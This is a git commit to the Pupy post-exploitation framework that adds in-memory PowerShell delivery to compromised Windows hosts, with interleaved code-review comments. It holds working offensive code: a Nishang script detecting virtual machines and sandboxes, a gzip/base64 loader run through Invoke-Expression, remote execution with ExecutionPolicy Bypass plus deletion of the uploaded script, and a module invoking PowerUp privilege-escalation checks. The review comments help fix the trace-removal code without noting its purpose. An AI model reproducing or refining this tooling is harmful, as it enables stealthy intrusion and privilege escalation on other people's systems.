adding new feature: powershell upload

This commit is contained in:
Alessandro ZANNI 2016-07-22 15:55:40 +02:00
parent d446596063
commit cb07309a90
6 changed files with 2708 additions and 0 deletions

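--- a/pupy/external/Nishang/Check-VM.ps1
+++ b/pupy/external/Nishang/Check-VM.ps1
@@ -0,0 +1,303 @@
+function Check-VM
+{
+<#
+.SYNOPSIS
+Nishang script which detects whether it is in a known virtual machine.
+.DESCRIPTION
+This script uses known parameters or 'fingerprints' of Hyper-V, VMWare, Virtual PC, Virtual Box,
+Xen and QEMU for detecting the environment.
+.EXAMPLE
+PS > Check-VM
+.LINK
+http://www.labofapenetrationtester.com/2013/01/quick-post-check-if-your-payload-is.html
+https://github.com/samratashok/nishang
+.NOTES
+The script draws heavily from checkvm.rb post module from msf.
+https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/checkvm.rb
+#>
+[CmdletBinding()] Param()
+$ErrorActionPreference = "SilentlyContinue"
+#Hyper-V
+$hyperv = Get-ChildItem HKLM:\SOFTWARE\Microsoft
+if (($hyperv -match "Hyper-V") -or ($hyperv -match "VirtualMachine"))
+{
+$hypervm = $true
+}
+if (!$hypervm)
+{
+$hyperv = Get-ItemProperty hklm:\HARDWARE\DESCRIPTION\System -Name SystemBiosVersion
+if ($hyperv -match "vrtual")
+{
+$hypervm = $true
+}
+}
+if (!$hypervm)
+{
+$hyperv = Get-ChildItem HKLM:\HARDWARE\ACPI\FADT
+if ($hyperv -match "vrtual")
+{
+$hypervm = $true
+}
+}
+if (!$hypervm)
+{
+$hyperv = Get-ChildItem HKLM:\HARDWARE\ACPI\RSDT
+if ($hyperv -match "vrtual")
+{
+$hypervm = $true
+}
+}
+if (!$hypervm)
+{
+$hyperv = Get-ChildItem HKLM:\SYSTEM\ControlSet001\Services
+if (($hyperv -match "vmicheartbeat") -or ($hyperv -match "vmicvss") -or ($hyperv -match "vmicshutdown") -or ($hyperv -match "vmiexchange"))
+{
+$hypervm = $true
+}
+}
+if ($hypervm)
+{
+"This is a Hyper-V machine."
+}
+#VMWARE
+$vmware = Get-ChildItem HKLM:\SYSTEM\ControlSet001\Services
+if (($vmware -match "vmdebug") -or ($vmware -match "vmmouse") -or ($vmware -match "VMTools") -or ($vmware -match "VMMEMCTL"))
+{
+$vmwarevm = $true
+}
+if (!$vmwarevm)
+{
+$vmware = Get-ItemProperty hklm:\HARDWARE\DESCRIPTION\System\BIOS -Name SystemManufacturer
+if ($vmware -match "vmware")
+{
+$vmwarevm = $true
+}
+}
+if (!$vmwarevm)
+{
+$vmware = Get-Childitem hklm:\hardware\devicemap\scsi -recurse | gp -Name identifier
+if ($vmware -match "vmware")
+{
+$vmwarevm = $true
+}
+}
+if (!$vmwarevm)
+{
+$vmware = Get-Process
+if (($vmware -eq "vmwareuser.exe") -or ($vmware -match "vmwaretray.exe"))
+{
+$vmwarevm = $true
+}
+}
+if ($vmwarevm)
+{
+"This is a VMWare machine."
+}
+#Virtual PC
+$vpc = Get-Process
+if (($vpc -eq "vmusrvc.exe") -or ($vpc -match "vmsrvc.exe"))
+{
+$vpcvm = $true
+}
+if (!$vpcvm)
+{
+$vpc = Get-Process
+if (($vpc -eq "vmwareuser.exe") -or ($vpc -match "vmwaretray.exe"))
+{
+$vpcvm = $true
+}
+}
+if (!$vpcvm)
+{
+$vpc = Get-ChildItem HKLM:\SYSTEM\ControlSet001\Services
+if (($vpc -match "vpc-s3") -or ($vpc -match "vpcuhub") -or ($vpc -match "msvmmouf"))
+{
+$vpcvm = $true
+}
+}
+if ($vpcvm)
+{
+"This is a Virtual PC."
+}
+#Virtual Box
+$vb = Get-Process
+if (($vb -eq "vboxservice.exe") -or ($vb -match "vboxtray.exe"))
+{
+$vbvm = $true
+}
+if (!$vbvm)
+{
+$vb = Get-ChildItem HKLM:\HARDWARE\ACPI\FADT
+if ($vb -match "vbox_")
+{
+$vbvm = $true
+}
+}
+if (!$vbvm)
+{
+$vb = Get-ChildItem HKLM:\HARDWARE\ACPI\RSDT
+if ($vb -match "vbox_")
+{
+$vbvm = $true
+}
+}
+if (!$vbvm)
+{
+$vb = Get-Childitem hklm:\hardware\devicemap\scsi -recurse | gp -Name identifier
+if ($vb -match "vbox")
+{
+$vbvm = $true
+}
+}
+if (!$vbvm)
+{
+$vb = Get-ItemProperty hklm:\HARDWARE\DESCRIPTION\System -Name SystemBiosVersion
+if ($vb -match "vbox")
+{
+$vbvm = $true
+}
+}
+if (!$vbvm)
+{
+$vb = Get-ChildItem HKLM:\SYSTEM\ControlSet001\Services
+if (($vb -match "VBoxMouse") -or ($vb -match "VBoxGuest") -or ($vb -match "VBoxService") -or ($vb -match "VBoxSF"))
+{
+$vbvm = $true
+}
+}
+if ($vbvm)
+{
+"This is a Virtual Box."
+}
+#Xen
+$xen = Get-Process
+if ($xen -eq "xenservice.exe")
+{
+$xenvm = $true
+}
+if (!$xenvm)
+{
+$xen = Get-ChildItem HKLM:\HARDWARE\ACPI\FADT
+if ($xen -match "xen")
+{
+$xenvm = $true
+}
+}
+if (!$xenvm)
+{
+$xen = Get-ChildItem HKLM:\HARDWARE\ACPI\DSDT
+if ($xen -match "xen")
+{
+$xenvm = $true
+}
+}
+if (!$xenvm)
+{
+$xen = Get-ChildItem HKLM:\HARDWARE\ACPI\RSDT
+if ($xen -match "xen")
+{
+$xenvm = $true
+}
+}
+if (!$xenvm)
+{
+$xen = Get-ChildItem HKLM:\SYSTEM\ControlSet001\Services
+if (($xen -match "xenevtchn") -or ($xen -match "xennet") -or ($xen -match "xennet6") -or ($xen -match "xensvc") -or ($xen -match "xenvdb"))
+{
+$xenvm = $true
+}
+}
+if ($xenvm)
+{
+"This is a Xen Machine."
+}
+#QEMU
+$qemu = Get-Childitem hklm:\hardware\devicemap\scsi -recurse | gp -Name identifier
+if ($qemu -match "qemu")
+{
+$qemuvm = $true
+}
+if (!$qemuvm)
+{
+$qemu = Get-ItemProperty hklm:HARDWARE\DESCRIPTION\System\CentralProcessor\0 -Name ProcessorNameString
+if ($qemu -match "qemu")
+{
+$qemuvm = $true
+}
+}
+if ($qemuvm)
+{
+"This is a Qemu machine."
+}
+}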


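--- a/pupy/modules/check_vm.py
+++ b/pupy/modules/check_vm.py
@@ -0,0 +1,20 @@
+# -*- coding: UTF8 -*-
+from pupylib.PupyModule import *
+import os
+from modules.lib.windows.powershell_upload import execute_powershell_script
+__class_name__="CheckVM"
+ROOT=os.path.abspath(os.path.join(os.path.dirname(__file__),".."))
+@config(compat="windows", category="gather")
+class CheckVM(PupyModule):
+""" check if running on Virtual Machine """
+def init_argparse(self):
+self.arg_parser = PupyArgumentParser(prog="CheckVM", description=self.__doc__)
+def run(self, args):
+content = open(os.path.join(ROOT, "external", "Nishang", "Check-VM.ps1"), 'r').read()
+function = 'Check-VM'
+output = execute_powershell_script(self, content, function)
+self.success("Output of the script: \n%s" % output)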
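Review bot: The line `content = open(os.path.join(ROOT, "external", "Nishang", "Check-VM.ps1"), 'r').read()` in run() never closes the file handle it opens; the same pattern appears in run() of pupy/modules/powerup.py in this commit. Use a context manager instead: `with open(os.path.join(ROOT, "external", "Nishang", "Check-VM.ps1"), 'r') as f:` followed by `content = f.read()`. The whole class is inside the hunk, so the change is local to run().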


@ -0,0 +1,10 @@
$base64 = "[BASE64]"
$data = [System.Convert]::FromBase64String($base64)
$ms = New-Object System.IO.MemoryStream
$ms.Write($data, 0, $data.Length)
$ms.Seek(0,0) | Out-Null
$cs = New-Object System.IO.Compression.GZipStream($ms, [System.IO.Compression.CompressionMode]::Decompress)
$sr = New-Object System.IO.StreamReader($cs)
$t = $sr.readtoend()
Invoke-Expression $t
Invoke-Expression [FUNCTION_NAME]
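Review bot: The reader and the two streams created before `$t = $sr.readtoend()` are never disposed, so the handles and the decompressed script text stay alive for the rest of the session; add `$sr.Dispose()` right after the read (StreamReader disposes the stream it wraps). Separately, the `[FUNCTION_NAME]` placeholder on the last line is spliced unquoted into a bare `Invoke-Expression`, so the string the Python side substitutes is evaluated as PowerShell source rather than looked up as a function name, and nothing on either side validates it. A one-line comment in the template should make that contract explicit: `# [FUNCTION_NAME] is inlined as PowerShell source, unquoted - the Python caller is its only source`.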


@ -0,0 +1,54 @@
from rpyc.utils.classic import upload
import base64
import tempfile
import gzip
import StringIO
import subprocess
import os
ROOT=os.path.abspath(os.path.join(os.path.dirname(__file__),"..", "..", ".."))
def execute_powershell_script(module, content, function):
template = open(os.path.join(ROOT, "modules", "lib", "utils", "upload_powershell_script_template.ps1"), 'r').read()
# compress the content of the script to upload
out = StringIO.StringIO()
with gzip.GzipFile(fileobj=out, mode="w") as f:
f.write(content)
# encode the gzip content in base64
encoded = base64.b64encode(out.getvalue())
# replace meta data from the template
template = template.replace('[BASE64]', encoded)
template = template.replace('[FUNCTION_NAME]', function)
output = ""
# execute of the powershell script in memory if the size is lower of the max size
if len(template) < 32710:
module.success("Executing the powershell code on memory")
cmd = []
cmd.append('powershell.exe')
cmd.append('/c')
cmd.append(template)
output = module.client.conn.modules.subprocess.check_output(cmd, stderr=subprocess.STDOUT, stdin=subprocess.PIPE, universal_newlines=True)
else:
tf = tempfile.NamedTemporaryFile()
f = open(tf.name, 'w')
f.write(template)
f.close()
remoteTempFolder = module.client.conn.modules['os.path'].expandvars("%TEMP%")
tfName = tf.name.split(os.sep)
tfName = tfName[len(tfName)-1]
module.success("Uploading powershell code to: %s\%s.ps1" % (remoteTempFolder, tfName))
upload(module.client.conn, tf.name, module.client.conn.modules['os.path'].join(remoteTempFolder, '%s.ps1' % tfName))
module.success("Executing the powershell code")
output = module.client.conn.modules.subprocess.check_output("PowerShell.exe -ExecutionPolicy Bypass -File %s.ps1"%(module.client.conn.modules['os.path'].join(remoteTempFolder, tfName)), stderr=subprocess.STDOUT, stdin=subprocess.PIPE, shell = True)
module.success("Removing the powershell code")
module.client.conn.modules.subprocess.check_output("cmd.exe del %s.ps1" % (module.client.conn.modules['os.path'].join(remoteTempFolder, tfName)), stderr=subprocess.STDOUT, stdin=subprocess.PIPE, shell = True)
return output
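Review bot: The cleanup line `module.client.conn.modules.subprocess.check_output("cmd.exe del %s.ps1" % ..., shell = True)` most likely never runs `del`, because cmd.exe only executes an argument string after `/c`, so the uploaded script is left behind in the target's %TEMP%; and since there is no try/finally it is also left behind whenever the preceding check_output raises CalledProcessError. The execution line builds `PowerShell.exe -ExecutionPolicy Bypass -File %s.ps1` as one string under `shell = True`, which breaks as soon as the expanded %TEMP% path contains a space, the remote path is recomputed three times, and the local temp file is opened twice (`NamedTemporaryFile()` then `open(tf.name, 'w')`) with the second handle closed but the first left to the garbage collector. The rewrite below computes the remote path once, writes through the NamedTemporaryFile handle, runs PowerShell with an argument list and no shell, and removes the remote file via `conn.modules.os.remove` in a `finally`; the in-memory branch is unchanged. The threshold `32710` on the `if` also deserves a named constant with a comment saying which limit it approximates (presumably the Windows command-line length limit - confirm).
```python
def execute_powershell_script(module, content, function):
    # … unchanged: template loading, gzip + base64 encoding, in-memory branch (len(template) < 32710) …
    else:
        remote_os_path = module.client.conn.modules['os.path']
        remote_temp_folder = remote_os_path.expandvars("%TEMP%")
        # the remote file keeps the local temp name, with a .ps1 suffix
        with tempfile.NamedTemporaryFile(suffix='.ps1') as tf:
            tf.write(template)
            tf.flush()
            remote_path = remote_os_path.join(remote_temp_folder, os.path.basename(tf.name))
            module.success("Uploading powershell code to: %s" % remote_path)
            upload(module.client.conn, tf.name, remote_path)
        try:
            module.success("Executing the powershell code")
            output = module.client.conn.modules.subprocess.check_output(
                ['PowerShell.exe', '-ExecutionPolicy', 'Bypass', '-File', remote_path],
                stderr=subprocess.STDOUT, stdin=subprocess.PIPE)
        finally:
            # remove the script even when check_output raises
            module.success("Removing the powershell code")
            module.client.conn.modules.os.remove(remote_path)
    return output
```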

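--- a/pupy/modules/powerup.py
+++ b/pupy/modules/powerup.py
@@ -0,0 +1,26 @@
+# -*- coding: UTF8 -*-
+from pupylib.PupyModule import *
+import os
+from modules.lib.windows.powershell_upload import execute_powershell_script
+__class_name__="PowerUp"
+ROOT=os.path.abspath(os.path.join(os.path.dirname(__file__),".."))
+@config(compat="windows", category="admin")
+class PowerUp(PupyModule):
+""" trying common Windows privilege escalation methods"""
+def init_argparse(self):
+self.arg_parser = PupyArgumentParser(prog="PowerUp", description=self.__doc__)
+def run(self, args):
+content = open(os.path.join(ROOT, "external", "PowerSploit", "Privesc", "PowerUp.ps1"), 'r').read()
+# launch all PowerUp checks
+function = 'Invoke-AllChecks'
+output = execute_powershell_script(self, content, function)
+# parse output depending on the PowerUp output
+output = output.replace('\r\n\r\n\r\n', '\r\n\r\n').replace("\n\n", "\n").replace("\n\n", "\n")
+self.success("Output of the script: \n%s" % output)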
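Review bot: The two consecutive `.replace("\n\n", "\n")` calls on the output line only partially collapse runs of blank lines (four newlines become one, five become two), and the comment `# parse output depending on the PowerUp output` does not say what the normalisation is meant to achieve. If the intent is to squash every run of blank lines, `output = re.sub(r'(\r?\n){2,}', r'\1', output)` (with `import re` added at the top of the file) does it in one pass regardless of run length; if the two-pass behaviour is deliberate, replace the comment with one that says so, e.g. `# collapse up to two levels of blank lines in the PowerUp report`.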